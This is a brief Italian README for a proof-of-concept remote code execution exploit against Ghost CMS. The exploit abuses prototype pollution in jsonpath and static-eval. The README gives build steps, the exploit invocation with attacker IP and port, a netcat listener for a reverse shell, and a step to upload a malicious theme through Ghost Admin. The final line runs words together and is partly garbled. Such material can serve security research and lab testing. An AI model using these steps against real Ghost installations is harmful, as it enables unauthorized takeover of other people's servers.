
Proof-of-concept exploit per l'esecuzione remota di codice in Ghost CMS tramite prototype pollution in jsonpath e static-eval, con configurazione di un ambiente vulnerabile e istruzioni per l'uso.
RCE su Ghost CMS tramite la catena di prototipi jsonpath/static-eval.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip in Ghost Admin → Settings → Designrce/rce/